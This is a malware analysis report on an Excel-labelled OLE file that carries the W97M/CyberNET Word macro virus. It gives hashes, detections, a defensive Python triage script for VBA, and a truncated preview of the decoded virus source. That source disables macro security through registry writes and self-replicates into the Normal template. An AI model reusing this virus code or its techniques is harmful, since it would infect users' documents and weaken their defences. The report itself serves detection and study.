Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6525127caa9c42ff…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 36.0 KB
Created: 2001-09-06 11:41:48
Authoring application: Microsoft Excel
First seen: 2012-06-14

MD5: 53f2baf50b0c824990b933124ded2419
SHA-1: c608744b134bfde69c0facf1226468ac7b67c63d
SHA-256: 6525127caa9c42ffac4de3293438632bc7130ddf9df55b86522c9ac89b019906

Risk score: 400

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1082 System Information Discovery
  • T1204.002 User Execution: Malicious File

The carved VBA source (macros.bas) identifies itself in its third line as the Word macro virus W97M/CyberNET (2000, Indonesia), which matches ClamAV's Doc.Trojan.Cybernet-1 on the artifact; the container itself is detected as Win.Trojan.Psycho-3. Although the OLE metadata names Microsoft Excel as the authoring application and the module is Excel's ThisWorkbook, the code is Word VBA: its entry point is Document_Close, which Excel does not fire as an event, and it relies on Word object-model members (ActiveDocument, NormalTemplate, System.PrivateProfileString, Options.VirusProtection, wdCancelDisabled). The On Error Resume Next at the top of the routine hides the errors this would raise outside Word.

As written for Word, the routine runs on every document close. It first lowers macro security: it writes Level = 1 under HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security and Options6 = 0 under the Office 8.0 Excel key through System.PrivateProfileString, sets Options.VirusProtection = False and greys out the Security... item of the Macro menu. It then replicates between the open document and the Normal template by copying its own lines with VBProject.VBComponents(1).CodeModule.AddFromString, prepending a Document_Open entry point when infecting a document and a Document_Close entry point plus ViewVBCode, ToolsMacro and FileOpen stubs (which disable Tools > Macro and re-run the infection after the File > Open dialog) when infecting the template. Before each template infection it renames its 37 internal identifiers (the UR50 table) to random two-letter-plus-digits names, which is why the source reads RP6236, JI3255 and so on; the artifact's "Obfuscation or payload: unlikely" verdict reflects the absence of string encoding, not the absence of this polymorphism. On 17 August or 25 December it additionally draws up to 69 randomly placed, randomly coloured shapes into the document and saves it in place.

The heuristics below also report Shell(), CreateObject and GetObject calls and a Workbook_Open handler. None of these appear in the truncated preview, so the extracted source shown here does not evidence download of a secondary payload; treat that as unconfirmed until the full 13,618-byte module is reviewed.

Heuristics (8)

  • CLAMAV_DETECTION [critical]: ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • OLE_VBA_MACROS [medium, 6 related findings]: Document contains VBA macro code
  • OLE_VBA_SHELL [critical]: Shell() call in VBA
  • OLE_VBA_DOCOPEN [high]: Document_Open macro (runs automatically when the document is opened)
  • OLE_VBA_WBOPEN [high]: Workbook_Open macro (runs automatically when the workbook is opened)
  • OLE_VBA_CREATEOBJ [high]: CreateObject call (late-bound COM object creation)
  • OLE_VBA_GETOBJ [high]: GetObject call (attaches to a running COM object or a file moniker)
  • OLE_VBA_PCODE_AUTOEXEC_EXEC [high]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where the visible source is unavailable.
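The following Python is an added example, not the scanner that produced the findings above and not part of this report's tooling. It reproduces the idea behind the OLE_VBA_* rules on decoded VBA source: find live auto-exec entry points, count execution, object-creation and self-modification tokens outside string literals, and flag the combination the last rule describes (the p-code stream scan itself is not shown). It is run over an abridged copy of the Document_Close routine from the artifact preview on this page, plus two short constructed samples; the rule ids VBA_PROJECT_ACCESS, VBA_CODE_INJECTION and VBA_REGISTRY_WRITE are names chosen for this example and do not appear in the report.

```python
"""Keyword triage of decoded VBA source, in the spirit of the OLE_VBA_* rules.

Added example, not the scanner behind the report above: it reproduces the idea
of the heuristics (an auto-exec entry point combined with execution, object or
self-modification tokens) on decoded source. The p-code stream scan named in
OLE_VBA_PCODE_AUTOEXEC_EXEC is not shown. HYPOTHETICAL marks ids chosen here.
"""
import re

# Entry points Office runs without a click once macros are allowed.
AUTOEXEC = {"AutoOpen", "AutoExec", "AutoClose", "AutoNew", "AutoExit",
            "Document_Open", "Document_Close", "Document_New",
            "Workbook_Open", "Workbook_Close", "Workbook_Activate"}
# Token -> rule id. The first three ids are the report's own.
TOKENS = {
    "Shell": "OLE_VBA_SHELL",
    "CreateObject": "OLE_VBA_CREATEOBJ",
    "GetObject": "OLE_VBA_GETOBJ",
    "VBProject": "VBA_PROJECT_ACCESS",             # HYPOTHETICAL
    "AddFromString": "VBA_CODE_INJECTION",         # HYPOTHETICAL
    "PrivateProfileString": "VBA_REGISTRY_WRITE",  # HYPOTHETICAL
}
EXEC_RULES = {"OLE_VBA_SHELL", "OLE_VBA_CREATEOBJ", "OLE_VBA_GETOBJ"}
STRING_RE = re.compile(r'"(?:[^"\n]|"")*"')  # VBA literal; "" escapes a quote
SUB_RE = re.compile(r"\bSub\s+(\w+)\s*\(")
REGKEY_RE = re.compile(r'"(HKEY_[A-Z_]+\\[^"]*)"')
DATE_RE = re.compile(r"Day\(Now\)\s*=\s*(\d+)\s+And\s+Month\(Now\)\s*=\s*(\d+)")


def triage_vba(source: str) -> dict:
    """Return the indicators found in one decoded VBA module."""
    # Drop blanks, the Attribute header and full-line comments.
    text = "\n".join(ln for ln in map(str.strip, source.splitlines())
                     if ln and not ln.startswith(("'", "Attribute ")))
    literals = STRING_RE.findall(text)
    stripped = STRING_RE.sub('""', text)  # blank literals before token matching
    # Live entry points: Sub declarations in code, not inside strings.
    auto_exec = sorted({m.group(1) for m in SUB_RE.finditer(stripped)} & AUTOEXEC)
    # Entry points inside string literals are code the macro writes elsewhere,
    # i.e. self-replication through CodeModule.AddFromString.
    generated = sorted({m.group(1) for lit in literals
                        for m in SUB_RE.finditer(lit)} & AUTOEXEC)
    # Whole-word token counts, keeping only rules that fired.
    hits = {rule: n for tok, rule in TOKENS.items()
            if (n := len(re.findall(rf"\b{tok}\b", stripped)))}
    self_modifying = {"VBA_PROJECT_ACCESS", "VBA_CODE_INJECTION"} <= set(hits)
    executes = bool(EXEC_RULES & set(hits))
    return {
        "auto_exec": auto_exec,
        "generated_entry_points": generated,
        "hits": hits,
        "registry_keys": sorted(set(REGKEY_RE.findall(text))),
        "date_triggers": sorted((int(m), int(d)) for d, m in DATE_RE.findall(stripped)),
        "self_modifying": self_modifying,
        # The combination OLE_VBA_PCODE_AUTOEXEC_EXEC describes, applied to source.
        "autoexec_with_exec": bool(auto_exec) and (executes or self_modifying),
    }


# Abridged copy of the Document_Close routine from the artifact preview above.
CYBERNET_EXCERPT = r'''
Private Sub Document_Close()
On Error Resume Next
'W97M/CyberNET (C)2000 - Indonesia By AnomOke! "I'm NOT Responsible For Any Damage That Posible Cause By My Virus...!!!"
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False: System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else: Options.VirusProtection _
= False: System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = &H0: End If
If Day(Now) = 17 And Month(Now) = 8 Or Day(Now) = 25 And Month(Now) = 12 Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName: Call VC6648: End If
MN5776 = ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
RQ8515 = NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines
If ActiveDocument.VBProject.Description <> "CyberNET" Or Left(ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(3, 14), 14) <> "'W97M/CyberNET" Then
Set BR4082 = ActiveDocument.VBProject.VBComponents
BR4082(1).CodeModule. _
AddFromString ("Private Sub Document_Open()" & vbCr & NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(2, RQ8515 - 19))
ActiveDocument.VBProject.Description = "CyberNET"
End If
'''
# Constructed samples (not from this page) to exercise the other branches.
DROPPER_SAMPLE = r'''
Sub AutoOpen()
Set sh = CreateObject("WScript.Shell")
sh.Run "cmd /c echo constructed sample"
End Sub
'''
BENIGN_SAMPLE = r'''
Sub FormatReport()
ActiveSheet.Range("A1").Font.Bold = True
End Sub
'''

if __name__ == "__main__":
    for name, src in (("CyberNET excerpt", CYBERNET_EXCERPT),
                      ("constructed dropper", DROPPER_SAMPLE),
                      ("constructed benign", BENIGN_SAMPLE)):
        r = triage_vba(src)
        print(f"{name}: flagged={r['autoexec_with_exec']} auto_exec={r['auto_exec']} hits={r['hits']}")
```

On the excerpt this reports Document_Close as the only live entry point, Document_Open only as generated text inside a string literal (the replication path), seven VBProject accesses, one AddFromString, three PrivateProfileString writes against the two Office security keys, and the 17 August / 25 December triggers; no Shell, CreateObject or GetObject token is present in the visible part of the module. Blanking string literals before matching matters in both directions: it keeps the "Private Sub Document_Open()" payload string from being mistaken for a live handler, and it keeps a Shell inside "WScript.Shell" from inflating the Shell() count.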

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13618 bytes
SHA-256: a6fe075211cde3504cd3d62f713a0f269b92422fb033a02c7a45bc8d395ab6dc
Detection: ClamAV: Doc.Trojan.Cybernet-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script; the listing below is truncated)
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
'W97M/CyberNET (C)2000 - Indonesia By AnomOke! "I'm NOT Responsible For Any Damage That Posible Cause By My Virus...!!!"
Application.EnableCancelKey = wdCancelDisabled: Options.SaveInterval = 1: Options.ConfirmConversions = False: Options.SaveNormalPrompt = False: Application.DisplayRecentFiles = False
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False: System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else: Options.VirusProtection _
= False: System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = &H0: End If
Call HH9466
If Day(Now) = 17 And Month(Now) = 8 Or Day(Now) = 25 And Month(Now) = 12 Then
Randomize: For HK184 = 1 To (Int(Rnd * 70))
ActiveDocument.Shapes.AddShape(Int(Rnd * 120), Int(Rnd * 200), Int(Rnd * 500), Int(Rnd * 500), Int(Rnd * 500)).Select
Selection.ShapeRange.Fill.ForeColor.RGB = RGB(Int(Rnd * 255), Int(Rnd * 255), Int(Rnd * 255))
Selection.ShapeRange.Fill.Visible = msoTrue
Selection.ShapeRange.Fill.Solid: Next HK184
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName: Call VC6648: End If
MN5776 = ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
RQ8515 = NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines
If ActiveDocument.VBProject.Description <> "CyberNET" Or Left(ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(3, 14), 14) <> "'W97M/CyberNET" Then
Set BR4082 = ActiveDocument.VBProject.VBComponents
Call NV6680(BR4082)
BR4082(1).CodeModule. _
AddFromString ("Private Sub Document_Open()" & vbCr & NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(2, RQ8515 - 19))
ActiveDocument.VBProject.Description = "CyberNET"
End If
If NormalTemplate.VBProject.Description <> "CyberNET" Or Left(NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(3, 14), 14) <> "'W97M/CyberNET" Then
Set BR4082 = NormalTemplate.VBProject.VBComponents
Call NV6680(BR4082)
Randomize
Dim UR50(1 To 37) As String
UR50(1) = "RP6236"
UR50(2) = "JI3255"
UR50(3) = "FR3570"
UR50(4) = "HH8039"
UR50(5) = "JT9846"
UR50(6) = "MN5776"
UR50(7) = "RQ8515"
UR50(8) = "BR4082"
UR50(9) = "JT8173"
UR50(10) = "LK8445"
UR50(11) = "EE7111"
UR50(12) = "NU6972"
UR50(13) = "HH9466"
UR50(14) = "RK5344"
UR50(15) = "AJ8871"
UR50(16) = "MU2056"
UR50(17) = "QH442"
UR50(18) = "CH2979"
UR50(19) = "AD5532"
UR50(20) = "QF692"
UR50(21) = "NV6680"
UR50(22) = "KE184"
UR50(23) = "GC2158"
UR50(24) = "HK184"
UR50(25) = "CR1726"
UR50(26) = "BG8413"
UR50(27) = "CK5437"
UR50(28) = "NL9381"
UR50(29) = "OL8190"
UR50(30) = "KD1649"
UR50(31) = "BM5181"
UR50(32) = "GN4877"
UR50(33) = "VC6648"
UR50(34) = "IM6298"
UR50(35) = "UV3228"
UR50(36) = "DC5962"
UR50(37) = _
"UR50"
For NU6972 = 1 To 37
JT8173 = (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & Int(Rnd * 100) & Int(Rnd * 100)
Call JT9846(JT8173, UR50(NU6972))
Next NU6972
ActiveDocument.Saved = True
BR4082(1).CodeModule. _
AddFromString ("Private Sub Document_Close()" & vbCr & ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(2, MN5776 - 1) & _
vbCr & "Sub ViewVBCode()" & vbCr & "CommandBars(" & Chr(34) & "Tools" & Chr(34) & ").Controls(" & Chr(34) & "Macro" & Chr(34) & ").Enabled = False" & vbCr & "End Sub" & vbCr & "Sub ToolsMacro()" _
& vbCr & "Call ViewVBCode" & vbCr & "End Sub" & vbCr & "Sub FileOpen()" & vbCr & "WordBasic.DisableAutoMacros True" & vbCr & "On Error Resume Next" & vbCr & _
"If Dialogs(80).Show <> 0 Then Call Document_Close" & vbCr & "WordBasic.DisableAutoMacros False" & vb
... (truncated)